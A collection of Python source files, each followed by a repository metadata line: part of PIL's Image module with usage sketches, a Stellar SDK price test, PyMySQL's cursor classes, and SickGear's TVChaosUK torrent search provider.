# @param *args Additional parameters for the given decoder.
# @return An Image object.
def fromstring(mode, size, data, decoder_name="raw", *args):
"Load image from string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if decoder_name == "raw" and args == ():
args = mode
im = new(mode, size)
im.fromstring(data, decoder_name, args)
return im
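##
# Usage sketch (illustrative helper, not part of the PIL API): a round trip
# between the tostring() method and the module-level fromstring() function
# documented above, using a small RGB image.
def _fromstring_usage_sketch():
    "Usage sketch only; rebuild an image from its raw pixel string."
    im = new("RGB", (2, 2))
    data = im.tostring()                     # packed "RGB" pixel data
    clone = fromstring("RGB", (2, 2), data)  # same mode, size and data
    return clone.mode, clone.size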
##
# (New in 1.1.4) Creates an image memory from pixel data in a string
# or byte buffer.
# <p>
# This function is similar to {@link #fromstring}, but uses data in
# the byte buffer, where possible. This means that changes to the
# original buffer object are reflected in this image. Not all modes
# can share memory; supported modes include "L", "RGBX", "RGBA", and
# "CMYK".
# <p>
# Note that this function decodes pixel data only, not entire images.
# If you have an entire image file in a string, wrap it in a
# <b>StringIO</b> object, and use {@link #open} to load it.
# <p>
# In the current version, the default parameters used for the "raw"
# decoder differ from those used for {@link #fromstring}. This is a
# bug, and will probably be fixed in a future release. The current
# release issues a warning if you do this; to disable the warning,
# you should provide the full set of parameters. See below for
# details.
#
# @param mode The image mode.
# @param size The image size.
# @param data An 8-bit string or other buffer object containing raw
# data for the given mode.
# @param decoder_name What decoder to use.
# @param *args Additional parameters for the given decoder. For the
# default encoder ("raw"), it's recommended that you provide the
# full set of parameters:
# <b>frombuffer(mode, size, data, "raw", mode, 0, 1)</b>.
# @return An Image object.
# @since 1.1.4
def frombuffer(mode, size, data, decoder_name="raw", *args):
"Load image from string or buffer"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if decoder_name == "raw":
if args == ():
if warnings:
warnings.warn(
"the frombuffer defaults may change in a future release; "
"for portability, change the call to read:\n"
" frombuffer(mode, size, data, 'raw', mode, 0, 1)",
RuntimeWarning, stacklevel=2
)
args = mode, 0, -1 # may change to (mode, 0, 1) post-1.1.6
if args[0] in _MAPMODES:
im = new(mode, (1,1))
im = im._new(
core.map_buffer(data, size, decoder_name, None, 0, args)
)
im.readonly = 1
return im
return apply(fromstring, (mode, size, data, decoder_name, args))
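##
# Usage sketch (illustrative helper, not part of the PIL API): calling
# frombuffer() with the full set of "raw" decoder parameters, as recommended
# above, so the defaults warning is not triggered. The 2x2 greyscale buffer
# is a made-up value.
def _frombuffer_usage_sketch():
    "Usage sketch only; map a small greyscale buffer without copying."
    raw = "\x00\x40\x80\xff"                          # four 8-bit pixels
    im = frombuffer("L", (2, 2), raw, "raw", "L", 0, 1)
    return im.mode, im.size, im.readonly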
##
# (New in 1.1.6) Create an image memory from an object exporting
# the array interface (using the buffer protocol).
#
# If obj is not contiguous, then the tostring method is called
# and {@link frombuffer} is used.
#
# @param obj Object with array interface
# @return An image memory.
_mode_dict = {
'u1' : 'L',
'u2' : 'S',
'b1' : '1',
'i4' : 'I',
'f4' : 'F',
}
def fromarray(obj):
arr = obj.__array_interface__
shape = arr['shape']
ndim = len(shape)
if ndim < 2 or ndim > 3:
raise TypeError("Only 2 and 3-dimensional arrays can be converted to images.")
try:
strides = arr['strides']
except KeyError:
strides = None
typestr = arr['typestr']
endian = typestr[0]
type_bits = typestr[1:]
try:
mode = _mode_dict[type_bits]
    except KeyError:
raise TypeError("Only arrays of type uint8, uint16, bool, int32, and float32 can be converted to images.")
if ndim == 3:
if mode != 'L':
raise TypeError("Can only unpack 8-bit values into LA/RGB/RGBA images.")
if shape[2] == 2:
mode = 'LA'
elif shape[2] == 3:
mode = 'RGB'
elif shape[2] == 4:
mode = 'RGBA'
else:
raise TypeError("Can only unpack LA/RGB/RGBA images")
size = shape[:2][::-1]
if mode == '1':
import numpy
obj = numpy.packbits(obj.astype(numpy.uint8).flat).tostring()
elif strides is not None:
obj = obj.tostring()
return frombuffer(mode, size, obj, "raw", mode, 0, 1)
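##
# Usage sketch (illustrative helper, not part of the PIL API): creating a
# greyscale image from a 2-D uint8 numpy array through the array interface
# handled by fromarray() above. Assumes numpy is installed.
def _fromarray_usage_sketch():
    "Usage sketch only; convert a small uint8 array to an 'L' image."
    import numpy
    arr = numpy.arange(12, dtype=numpy.uint8).reshape(4, 3)  # 4 rows, 3 cols
    im = fromarray(arr)           # mode "L"; size is (width, height) = (3, 4)
    return im.mode, im.size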
##
# Opens and identifies the given image file.
# <p>
# This is a lazy operation; this function identifies the file, but the
# actual image data is not read from the file until you try to process
# the data (or call the {@link #Image.load} method).
#
# @def open(file, mode="r")
# @param file A filename (string) or a file object. The file object
# must implement <b>read</b>, <b>seek</b>, and <b>tell</b> methods,
# and be opened in binary mode.
# @param mode The mode. If given, this argument must be "r".
# @return An Image object.
# @exception IOError If the file cannot be found, or the image cannot be
# opened and identified.
# @see #new
def open(fp, mode="r"):
"Open an image file, without loading the raster data"
if mode != "r":
raise ValueError("bad mode")
if isStringType(fp):
import __builtin__
filename = fp
fp = __builtin__.open(fp, "rb")
else:
filename = ""
prefix = fp.read(16)
preinit()
for i in ID:
try:
factory, accept = OPEN[i]
if not accept or accept(prefix):
fp.seek(0)
return factory(fp, filename)
except (SyntaxError, IndexError, TypeError):
pass
init()
for i in ID:
try:
factory, accept = OPEN[i]
if not accept or accept(prefix):
fp.seek(0)
return factory(fp, filename)
except (SyntaxError, IndexError, TypeError):
pass
raise IOError("cannot identify image file")
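##
# Usage sketch (illustrative helper, not part of the PIL API): open() is
# lazy, as described above; it identifies the file but defers reading the
# raster data until load() or another operation needs it. The filename below
# is a placeholder.
def _open_usage_sketch(path="example.png"):
    "Usage sketch only; identify an image, then force the pixel data in."
    im = open(path)                        # header parsed, data not yet read
    identified = (im.format, im.mode, im.size)
    im.load()                              # explicitly read the raster data
    return identified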
# --------------------------------------------------------------------
# Plugin registry
##
# Register an image file plugin. This function should not be used
# in application code.
#
# @param id An image format identifier.
# @param factory An image file factory method.
# @param accept An optional function that can be used to quickly
# reject images having another format.
def register_open(id, factory, accept=None):
id = string.upper(id)
ID.append(id)
OPEN[id] = factory, accept
##
# Registers an image MIME type. This function should not be used
# in application code.
#
# @param id An image format identifier.
# @param mimetype The image MIME type for this format.
def register_mime(id, mimetype):
MIME[string.upper(id)] = mimetype
##
# Registers an image save function. This function should not be
# used in application code.
#
# @param id An image format identifier.
# @param driver A function to save images in this format.
def register_save(id, driver):
SAVE[string.upper(id)] = driver
##
# Registers an image extension. This function should not be
# used in application code.
#
# @param id An image format identifier.
# @param extension An extension used for this format.
def register_extension(id, extension):
EXTENSION[string.lower(extension)] = string.upper(id)
| tdsmith/celltool | celltool/utility/pil_lite/PIL/Image.py | Python | gpl-2.0 | 30,891 |
from stellar_sdk import Price
class TestPrice:
def test_xdr(self):
n, d = 1, 2
price_obj = Price(n, d).to_xdr_object()
assert price_obj.to_xdr() == "AAAAAQAAAAI="
from_instance = Price.from_xdr_object(price_obj)
assert isinstance(from_instance, Price)
assert from_instance.n == n
assert from_instance.d == d
def test_from_raw_price(self):
raw_price = "2.93850088"
price = Price.from_raw_price(raw_price)
assert price.n == 36731261
assert price.d == 12500000
def test_equals(self):
assert Price(1, 2) == Price(1, 2)
assert Price(1, 2) != Price(3, 4)
assert Price(1, 2) != "BAD TYPE"
| StellarCN/py-stellar-base | tests/test_price.py | Python | apache-2.0 | 710 |
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
from functools import partial
import re
import warnings
from ._compat import range_type, text_type, PY2
from . import err
#: Regular expression for :meth:`Cursor.executemany`.
#: executemany only supports simple bulk insert.
#: You can use it to load large dataset.
RE_INSERT_VALUES = re.compile(
r"\s*((?:INSERT|REPLACE)\b.+\bVALUES?\s*)" +
r"(\(\s*(?:%s|%\(.+\)s)\s*(?:,\s*(?:%s|%\(.+\)s)\s*)*\))" +
r"(\s*(?:ON DUPLICATE.*)?);?\s*\Z",
re.IGNORECASE | re.DOTALL)
class Cursor(object):
"""
This is the object you use to interact with the database.
Do not create an instance of a Cursor yourself. Call
connections.Connection.cursor().
See `Cursor <https://www.python.org/dev/peps/pep-0249/#cursor-objects>`_ in
the specification.
"""
#: Max statement size which :meth:`executemany` generates.
#:
#: Max size of allowed statement is max_allowed_packet - packet_header_size.
#: Default value of max_allowed_packet is 1048576.
max_stmt_length = 1024000
_defer_warnings = False
def __init__(self, connection):
self.connection = connection
self.description = None
self.rownumber = 0
self.rowcount = -1
self.arraysize = 1
self._executed = None
self._result = None
self._rows = None
self._warnings_handled = False
def close(self):
"""
Closing a cursor just exhausts all remaining data.
"""
conn = self.connection
if conn is None:
return
try:
while self.nextset():
pass
finally:
self.connection = None
def __enter__(self):
return self
def __exit__(self, *exc_info):
del exc_info
self.close()
def _get_db(self):
if not self.connection:
raise err.ProgrammingError("Cursor closed")
return self.connection
def _check_executed(self):
if not self._executed:
raise err.ProgrammingError("execute() first")
def _conv_row(self, row):
return row
def setinputsizes(self, *args):
"""Does nothing, required by DB API."""
def setoutputsizes(self, *args):
"""Does nothing, required by DB API."""
def _nextset(self, unbuffered=False):
"""Get the next query set"""
conn = self._get_db()
current_result = self._result
# for unbuffered queries warnings are only available once whole result has been read
if unbuffered:
self._show_warnings()
if current_result is None or current_result is not conn._result:
return None
if not current_result.has_next:
return None
self._result = None
self._clear_result()
conn.next_result(unbuffered=unbuffered)
self._do_get_result()
return True
def nextset(self):
return self._nextset(False)
def _ensure_bytes(self, x, encoding=None):
if isinstance(x, text_type):
x = x.encode(encoding)
elif isinstance(x, (tuple, list)):
x = type(x)(self._ensure_bytes(v, encoding=encoding) for v in x)
return x
def _escape_args(self, args, conn):
ensure_bytes = partial(self._ensure_bytes, encoding=conn.encoding)
if isinstance(args, (tuple, list)):
if PY2:
args = tuple(map(ensure_bytes, args))
return tuple(conn.literal(arg) for arg in args)
elif isinstance(args, dict):
if PY2:
args = {ensure_bytes(key): ensure_bytes(val) for
(key, val) in args.items()}
return {key: conn.literal(val) for (key, val) in args.items()}
else:
# If it's not a dictionary let's try escaping it anyways.
            # Worst case it will throw a ValueError
if PY2:
args = ensure_bytes(args)
return conn.escape(args)
def mogrify(self, query, args=None):
"""
Returns the exact string that is sent to the database by calling the
execute() method.
This method follows the extension to the DB API 2.0 followed by Psycopg.
"""
conn = self._get_db()
if PY2: # Use bytes on Python 2 always
query = self._ensure_bytes(query, encoding=conn.encoding)
if args is not None:
query = query % self._escape_args(args, conn)
return query
def execute(self, query, args=None):
"""Execute a query
:param str query: Query to execute.
:param args: parameters used with query. (optional)
:type args: tuple, list or dict
:return: Number of affected rows
:rtype: int
If args is a list or tuple, %s can be used as a placeholder in the query.
If args is a dict, %(name)s can be used as a placeholder in the query.
"""
while self.nextset():
pass
query = self.mogrify(query, args)
result = self._query(query)
self._executed = query
return result
def executemany(self, query, args):
# type: (str, list) -> int
"""Run several data against one query
:param query: query to execute on server
:param args: Sequence of sequences or mappings. It is used as parameter.
:return: Number of rows affected, if any.
This method improves performance on multiple-row INSERT and
REPLACE. Otherwise it is equivalent to looping over args with
execute().
"""
if not args:
return
m = RE_INSERT_VALUES.match(query)
if m:
q_prefix = m.group(1) % ()
q_values = m.group(2).rstrip()
q_postfix = m.group(3) or ''
assert q_values[0] == '(' and q_values[-1] == ')'
return self._do_execute_many(q_prefix, q_values, q_postfix, args,
self.max_stmt_length,
self._get_db().encoding)
self.rowcount = sum(self.execute(query, arg) for arg in args)
return self.rowcount
def _do_execute_many(self, prefix, values, postfix, args, max_stmt_length, encoding):
conn = self._get_db()
escape = self._escape_args
if isinstance(prefix, text_type):
prefix = prefix.encode(encoding)
if PY2 and isinstance(values, text_type):
values = values.encode(encoding)
if isinstance(postfix, text_type):
postfix = postfix.encode(encoding)
sql = bytearray(prefix)
args = iter(args)
v = values % escape(next(args), conn)
if isinstance(v, text_type):
if PY2:
v = v.encode(encoding)
else:
v = v.encode(encoding, 'surrogateescape')
sql += v
rows = 0
for arg in args:
v = values % escape(arg, conn)
if isinstance(v, text_type):
if PY2:
v = v.encode(encoding)
else:
v = v.encode(encoding, 'surrogateescape')
if len(sql) + len(v) + len(postfix) + 1 > max_stmt_length:
rows += self.execute(sql + postfix)
sql = bytearray(prefix)
else:
sql += b','
sql += v
rows += self.execute(sql + postfix)
self.rowcount = rows
return rows
def callproc(self, procname, args=()):
"""Execute stored procedure procname with args
procname -- string, name of procedure to execute on server
args -- Sequence of parameters to use with procedure
Returns the original args.
Compatibility warning: PEP-249 specifies that any modified
parameters must be returned. This is currently impossible
as they are only available by storing them in a server
variable and then retrieved by a query. Since stored
procedures return zero or more result sets, there is no
reliable way to get at OUT or INOUT parameters via callproc.
The server variables are named @_procname_n, where procname
is the parameter above and n is the position of the parameter
(from zero). Once all result sets generated by the procedure
have been fetched, you can issue a SELECT @_procname_0, ...
query using .execute() to get any OUT or INOUT values.
Compatibility warning: The act of calling a stored procedure
itself creates an empty result set. This appears after any
result sets generated by the procedure. This is non-standard
behavior with respect to the DB-API. Be sure to use nextset()
to advance through all result sets; otherwise you may get
disconnected.
"""
conn = self._get_db()
if args:
fmt = '@_{0}_%d=%s'.format(procname)
self._query('SET %s' % ','.join(fmt % (index, conn.escape(arg))
for index, arg in enumerate(args)))
self.nextset()
q = "CALL %s(%s)" % (procname,
','.join(['@_%s_%d' % (procname, i)
for i in range_type(len(args))]))
self._query(q)
self._executed = q
return args
def fetchone(self):
"""Fetch the next row"""
self._check_executed()
if self._rows is None or self.rownumber >= len(self._rows):
return None
result = self._rows[self.rownumber]
self.rownumber += 1
return result
def fetchmany(self, size=None):
"""Fetch several rows"""
self._check_executed()
if self._rows is None:
return ()
end = self.rownumber + (size or self.arraysize)
result = self._rows[self.rownumber:end]
self.rownumber = min(end, len(self._rows))
return result
def fetchall(self):
"""Fetch all the rows"""
self._check_executed()
if self._rows is None:
return ()
if self.rownumber:
result = self._rows[self.rownumber:]
else:
result = self._rows
self.rownumber = len(self._rows)
return result
def scroll(self, value, mode='relative'):
self._check_executed()
if mode == 'relative':
r = self.rownumber + value
elif mode == 'absolute':
r = value
else:
raise err.ProgrammingError("unknown scroll mode %s" % mode)
if not (0 <= r < len(self._rows)):
raise IndexError("out of range")
self.rownumber = r
def _query(self, q):
conn = self._get_db()
self._last_executed = q
self._clear_result()
conn.query(q)
self._do_get_result()
return self.rowcount
def _clear_result(self):
self.rownumber = 0
self._result = None
self.rowcount = 0
self.description = None
self.lastrowid = None
self._rows = None
def _do_get_result(self):
conn = self._get_db()
self._result = result = conn._result
self.rowcount = result.affected_rows
self.description = result.description
self.lastrowid = result.insert_id
self._rows = result.rows
self._warnings_handled = False
if not self._defer_warnings:
self._show_warnings()
def _show_warnings(self):
if self._warnings_handled:
return
self._warnings_handled = True
if self._result and (self._result.has_next or not self._result.warning_count):
return
ws = self._get_db().show_warnings()
if ws is None:
return
for w in ws:
msg = w[-1]
if PY2:
if isinstance(msg, unicode):
msg = msg.encode('utf-8', 'replace')
warnings.warn(err.Warning(*w[1:3]), stacklevel=4)
def __iter__(self):
return iter(self.fetchone, None)
Warning = err.Warning
Error = err.Error
InterfaceError = err.InterfaceError
DatabaseError = err.DatabaseError
DataError = err.DataError
OperationalError = err.OperationalError
IntegrityError = err.IntegrityError
InternalError = err.InternalError
ProgrammingError = err.ProgrammingError
NotSupportedError = err.NotSupportedError
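# Usage sketch (illustrative helper, not part of this module's API): typical
# use of the Cursor methods documented above. The connection object, table
# and procedure names are placeholders. executemany() folds the multi-row
# INSERT into bulk statements, and the procedure's OUT value is read back via
# the @_procname_n server variable described in the callproc() docstring.
def _cursor_usage_sketch(connection):
    """Usage sketch only; execute/executemany/callproc patterns."""
    with connection.cursor() as cur:
        cur.execute("SELECT %s + %s", (1, 2))
        total = cur.fetchone()
        cur.executemany(
            "INSERT INTO example_tbl (a, b) VALUES (%s, %s)",
            [(1, 'x'), (2, 'y'), (3, 'z')])
        cur.callproc('example_proc', ('in-value',))
        while cur.nextset():               # drain the procedure's result sets
            pass
        cur.execute("SELECT @_example_proc_0")
        out_value = cur.fetchone()
    return total, out_value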
class DictCursorMixin(object):
# You can override this to use OrderedDict or other dict-like types.
dict_type = dict
def _do_get_result(self):
super(DictCursorMixin, self)._do_get_result()
fields = []
if self.description:
for f in self._result.fields:
name = f.name
if name in fields:
name = f.table_name + '.' + name
fields.append(name)
self._fields = fields
if fields and self._rows:
self._rows = [self._conv_row(r) for r in self._rows]
def _conv_row(self, row):
if row is None:
return None
return self.dict_type(zip(self._fields, row))
class DictCursor(DictCursorMixin, Cursor):
"""A cursor which returns results as a dictionary"""
class SSCursor(Cursor):
"""
Unbuffered Cursor, mainly useful for queries that return a lot of data,
or for connections to remote servers over a slow network.
Instead of copying every row of data into a buffer, this will fetch
rows as needed. The upside of this is the client uses much less memory,
and rows are returned much faster when traveling over a slow network
or if the result set is very big.
There are limitations, though. The MySQL protocol doesn't support
returning the total number of rows, so the only way to tell how many rows
there are is to iterate over every row returned. Also, it currently isn't
possible to scroll backwards, as only the current row is held in memory.
"""
_defer_warnings = True
def _conv_row(self, row):
return row
def close(self):
conn = self.connection
if conn is None:
return
if self._result is not None and self._result is conn._result:
self._result._finish_unbuffered_query()
try:
while self.nextset():
pass
finally:
self.connection = None
__del__ = close
def _query(self, q):
conn = self._get_db()
self._last_executed = q
self._clear_result()
conn.query(q, unbuffered=True)
self._do_get_result()
return self.rowcount
def nextset(self):
return self._nextset(unbuffered=True)
def read_next(self):
"""Read next row"""
return self._conv_row(self._result._read_rowdata_packet_unbuffered())
def fetchone(self):
"""Fetch next row"""
self._check_executed()
row = self.read_next()
if row is None:
self._show_warnings()
return None
self.rownumber += 1
return row
def fetchall(self):
"""
Fetch all, as per MySQLdb. Pretty useless for large queries, as
it is buffered. See fetchall_unbuffered(), if you want an unbuffered
generator version of this method.
"""
return list(self.fetchall_unbuffered())
def fetchall_unbuffered(self):
"""
Fetch all, implemented as a generator, which isn't to standard,
however, it doesn't make sense to return everything in a list, as that
would use ridiculous memory for large result sets.
"""
return iter(self.fetchone, None)
def __iter__(self):
return self.fetchall_unbuffered()
def fetchmany(self, size=None):
"""Fetch many"""
self._check_executed()
if size is None:
size = self.arraysize
rows = []
for i in range_type(size):
row = self.read_next()
if row is None:
self._show_warnings()
break
rows.append(row)
self.rownumber += 1
return rows
def scroll(self, value, mode='relative'):
self._check_executed()
if mode == 'relative':
if value < 0:
raise err.NotSupportedError(
"Backwards scrolling not supported by this cursor")
for _ in range_type(value):
self.read_next()
self.rownumber += value
elif mode == 'absolute':
if value < self.rownumber:
raise err.NotSupportedError(
"Backwards scrolling not supported by this cursor")
end = value - self.rownumber
for _ in range_type(end):
self.read_next()
self.rownumber = value
else:
raise err.ProgrammingError("unknown scroll mode %s" % mode)
class SSDictCursor(DictCursorMixin, SSCursor):
"""An unbuffered cursor, which returns results as a dictionary"""
| imron/scalyr-agent-2 | scalyr_agent/third_party/pymysql/cursors.py | Python | apache-2.0 | 17,238 |
# coding=utf-8
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import random
import re
import time
import traceback
from . import generic
from .. import logger
from ..config import naming_ep_type
from ..helpers import try_int
from bs4_parser import BS4Parser
from dateutil.parser import parse
from _23 import unidecode, unquote_plus
from six import iteritems
class TVChaosUKProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, 'TVChaosUK')
self.url_base = 'https://tvchaosuk.com/'
self.urls = {'config_provider_home_uri': self.url_base,
'login_action': self.url_base + 'login',
'search': self.url_base + 'torrents/filter?%s' % '&'.join(
['search=%s', 'page=0', 'tmdb=', 'imdb=', 'tvdb=', 'description=', 'uploader=', 'view=list',
'start_year=', 'end_year=', 'sorting=created_at', 'direction=desc', 'qty=100', '_token=%s',
'types[]=SD', 'types[]=HD720p', 'types[]=HD1080p',
'types[]=SD Pack', 'types[]=HD720p Pack', 'types[]=HD1080p Pack'])}
self.url = self.urls['config_provider_home_uri']
self.username, self.password, self._token, \
self.freeleech, self.minseed, self.minleech, self.use_after_get_data = 7 * [None]
def _authorised(self, **kwargs):
return super(TVChaosUKProvider, self)._authorised(logged_in=self.logged_in, post_params={'remember': '1'})
def logged_in(self, resp=None):
result = True
if not self._token:
try:
result = 'Username' not in resp and 'Logout' in resp
input_tag = re.findall(r'(<input[^>]+?"(?:hidden|_token)"[^>]+?"(?:hidden|_token)"[^>]+?>)', resp)[0]
token = re.findall(r'value\s*=\s*["\']\s*([^"\'\s]+)', input_tag)[0]
csrf = re.findall(r'<meta[^>]+csrf-token[^>]+content[^"]+"\s*([^\s"]+)', resp)[0]
self._token = result and csrf == token and token
except (BaseException, Exception):
result = False
return result
def _search_provider(self, search_params, **kwargs):
results = []
if not self._authorised():
return results
items = {'Cache': [], 'Season': [], 'Episode': [], 'Propers': []}
rc = dict([(k, re.compile('(?i)' + v)) for (k, v) in iteritems({
'info': r'/torrents?/(?P<tid>(?P<tid_num>\d{2,})[^"]*)', 'get': 'download'})])
for mode in search_params:
for search_string in search_params[mode]:
search_string = unidecode(unquote_plus(search_string))
vals = [i for i in range(5, 16)]
random.SystemRandom().shuffle(vals)
attempts = html = soup = tbl = None
fetch = 'failed fetch'
for attempts, s in enumerate((0, vals[0], vals[5], vals[10])):
time.sleep(s)
html = self.get_url(self.urls['search'] % (search_string, self._token))
if self.should_skip():
return results
if html:
try:
soup = BS4Parser(html).soup
tbl = soup.find('table', class_='table')
if tbl:
fetch = 'data fetched'
break
except (BaseException, Exception):
pass
if attempts:
logger.log('%s %s after %s attempts' % (mode, fetch, attempts+1))
cnt = len(items[mode])
try:
if not html or self._has_no_results(html) or not tbl:
raise generic.HaltParseException
tbl_rows = tbl.find_all('tr')
if 2 > len(tbl_rows):
raise generic.HaltParseException
head = None
for tr in tbl_rows[1:]:
cells = tr.find_all('td')
if 6 > len(cells):
continue
try:
head = head if None is not head else self._header_row(tr)
seeders, leechers, size = [try_int(n, n) for n in [
cells[head[x]].get_text().strip() for x in ('seed', 'leech', 'size')]]
if self._reject_item(seeders, leechers, self.freeleech and (
None is tr.find('i', class_='fa-star'))):
continue
title = tr.find('a', href=rc['info']).get_text().strip()
download_url = self._link(tr.find('a', href=rc['get'])['href'])
except (BaseException, Exception):
continue
try:
titles = self.regulate_title(title, mode, search_string)
if download_url and titles:
for title in titles:
items[mode].append((title, download_url, seeders, self._bytesizer(size)))
except (BaseException, Exception):
pass
except generic.HaltParseException:
pass
except (BaseException, Exception):
logger.log(u'Failed to parse. Traceback: %s' % traceback.format_exc(), logger.ERROR)
if soup:
soup.clear(True)
del soup
self._log_search(mode, len(items[mode]) - cnt,
('search string: ' + search_string.replace('%', '%%'), self.name)['Cache' == mode])
if mode in 'Season' and len(items[mode]):
break
results = self._sort_seeding(mode, results + items[mode])
return results
@staticmethod
def regulate_title(title, mode='-', search_string=''):
# normalise abnormal naming patterns e.g. 2019/20 -> 2019
title = re.sub(r'((?:19|20)\d\d)/20(\d\d)?', r'\1', title)
# s<x> ep<y> -> s<x>e<y>
title = re.sub(r'(?i)s(\d\d+)[\W]*?e+(?:p|pisode)*(\d\d+)', r'S\1E\2', title)
has_series = re.findall(r'(?i)(.*?series[^\d]*?\d+)(.*)', title)
if has_series:
rc_xtras = re.compile(r'(?i)([. _-]|^)(special|extra)s?\w*([. _-]|$)')
has_special = rc_xtras.findall(has_series[0][1])
if has_special:
title = has_series[0][0] + rc_xtras.sub(list(set(
list(has_special[0][0]) + list(has_special[0][2])))[0], has_series[0][1])
title = re.sub('(?i)series', r'Season', title)
years = re.findall(r'((?:19|20)\d\d)', title)
title = re.sub(r'(19|20)\d\d', r'{{yr}}', title)
title_parts = re.findall(
r'(?im)^(.*?)(?:Season[^\d]*?(\d+).*?)?' +
r'(?:(?:pack|part|pt)\W*?)?(\d+)[^\d]*?of[^\d]*?(?:\d+)(.*?)$', title)
sxe_build = None
if len(title_parts):
new_parts = [try_int(part, part) for part in title_parts[0]]
if not new_parts[1]:
new_parts[1] = 1
new_parts[2] = ('E%02d', ' Pack %d')[any([re.search('(?i)season|series', title),
mode in 'Season'])] % new_parts[2]
sxe_build = 'S%02d%s' % tuple(new_parts[1:3])
title = '%s`%s`%s' % (new_parts[0], sxe_build, new_parts[-1])
for yr in years:
# noinspection RegExpRedundantEscape
title = re.sub(r'\{\{yr\}\}', yr, title, count=1)
date_re = r'(?i)([(\s.]*)((?:\d+[\s.]*(?:st|nd|rd|th)?[\s.])?)([adfjmnos]\w{2,}[\s.]+)((?:19|20)\d\d)([)\s.]*)'
dated = re.findall(date_re, title)
dnew = None
for d in dated:
try:
dout = parse(''.join(d[1:4])).strftime('%Y-%m-%d')
dnew = dout[0: not any(d[2]) and 4 or not any(d[1]) and 7 or len(dout)]
title = title.replace(''.join(d), '%s%s%s' % (('', ' ')[1 < len(d[0])], dnew, ('', ' ')[1 < len(d[4])]))
except (BaseException, Exception):
pass
if dated:
add_pad = re.findall(r'((?:19|20)\d\d[-]\d\d[-]\d\d)([\w\W])', title)
if any(add_pad) and add_pad[0][1] not in [' ', '.']:
title = title.replace(''.join(
add_pad[0]), '%s %s' % (add_pad[0][0], add_pad[0][1]))
title = re.sub(r'(?sim)(.*?)(?:Episode|Season).\d+.(.*)', r'\1\2', title)
t = ['']
bl = r'[*\[({]+\s*'
br = r'\s*[})\]*]+'
title = re.sub('(.*?)((?i)%sproper%s)(.*)' % (bl, br), r'\1\3\2', title)
for r in (r'\s+-\s+', r'(?:19|20)\d\d(?:\-\d\d\-\d\d)?', r'S\d\d+(?:E\d\d+)?'):
m = re.findall('(.*%s)(.*)' % r, title)
if any(m) and len(m[0][0]) > len(t[0]):
t = m[0]
t = ([title], t)[any(t)]
tags = [re.findall(x, t[-1], flags=re.X) for x in
('(?i)%sProper%s|\bProper\b$' % (bl, br),
r'(?i)(?:\d{3,4}(?:[pi]|hd)|hd(?:tv)?\s*\d{3,4}(?:[pi])?)',
'''
(?i)(hr.ws.pdtv|blu.?ray|hddvd|
pdtv|hdtv|dsr|tvrip|web.?(?:dl|rip)|dvd.?rip|b[r|d]rip|mpeg-?2)
''', '''
(?i)([hx].?26[45]|divx|xvid)
''', '''
(?i)(avi|mkv|mp4|sub(?:b?ed|pack|s))
''')]
title = ('%s`%s' % (
re.sub('|'.join(['|'.join([re.escape(y) for y in x]) for x in tags if x]).strip('|'), '', t[-1]),
re.sub(r'(?i)(?:hd(?:tv)?\s*)?(\d{3,4})(?:hd|p)?', r'\1p',
'`'.join(['`'.join(x) for x in tags[:-1]]).rstrip('`')) +
('', '`hdtv')[not any(tags[2])] + ('', '`x264')[not any(tags[3])]))
title = re.sub(r'([hx]26[45])p', r'\1', title)
for r in [(r'(?i)(?:\W(?:Series|Season))?\W(Repack)\W', r'`\1`'),
('(?i)%s(Proper)%s' % (bl, br), r'`\1`'), (r'%s\s*%s' % (bl, br), '`')]:
title = re.sub(r[0], r[1], title)
title = re.sub(r'[][]', '', title)
title = '%s%s-nogrp' % (('', t[0])[1 < len(t)], title)
for r in [(r'\s+[-]?\s+|\s+`|`\s+', '`'), ('`+', ' ')]:
title = re.sub(r[0], r[1], title)
titles = []
if dnew:
snew = None
dated_s = re.findall(date_re, search_string)
for d in dated_s:
try:
sout = parse(''.join(d[1:4])).strftime('%Y-%m-%d')
snew = sout[0: not any(d[2]) and 4 or not any(d[1]) and 7 or len(sout)]
except (BaseException, Exception):
pass
if snew and dnew and snew != dnew:
return titles
try:
sxxexx_r = r'(?i)S\d\d+E\d\d+'
if dnew and re.search(sxxexx_r, title):
titles += [re.sub(sxxexx_r, dnew, re.sub(r'[_.\-\s]?%s' % dnew, '', title))]
except (BaseException, Exception):
pass
titles += [title]
result = []
for cur_item in titles:
sxe_find = r'(?i)%s' % (sxe_build, r'S\d\d+E\d\d+|season\s*\d+')[not sxe_build]
sxe = re.findall(sxe_find, cur_item) or ''
if sxe:
sxe = sxe[0]
cur_item = re.sub(sxe, r'{{sxe}}', cur_item)
dated = dnew and re.findall(dnew, cur_item) or ''
if dated:
dated = dated[0]
cur_item = re.sub(dated, r'{{dated}}', cur_item)
parts = []
pre_post = re.findall(r'(.*?){{.*}}[.]*(.*)', cur_item)
item = re.sub(r'{{(sxe|dated)}}[.]*', '', cur_item)
end = [item]
if pre_post and (sxe or dated):
divider = ':'
tail = re.findall(r'(?i)^([^%s]+)(.*)' % divider, item)[0]
if tail[1]: # show name divider found
parts = [tail[0].strip()]
end = [tail[1].lstrip('%s ' % divider)]
else:
parts = [pre_post[0][0]]
end = [pre_post[0][1]]
parts += ([sxe], [])[not sxe] + ([dated], [])[not dated] + end
result += [re.sub(r'(\s\.|\.\s|\s+)', '.', ' '.join(parts))]
return result
@staticmethod
def regulate_cache_torrent_file(title):
return re.sub(r'\b(\s*subs)\b([\W\w]{0,20})$', r'\2', title)
def after_get_data(self, result):
if self.use_after_get_data:
try:
self.get_url(self.url_base + 'thanks/%s' % re.findall(r'download/(\d+)', result.url)[0])
except IndexError:
pass
def _season_strings(self, ep_obj, **kwargs):
return \
generic.TorrentProvider._season_strings(
self, ep_obj, scene=False, sp_detail=(
lambda e: [(('', 'Series %(seasonnumber)d ')[1 < try_int(e.get('seasonnumber'))]
+ '%(episodenumber)d of') % e, 'Series %(seasonnumber)d' % e]))
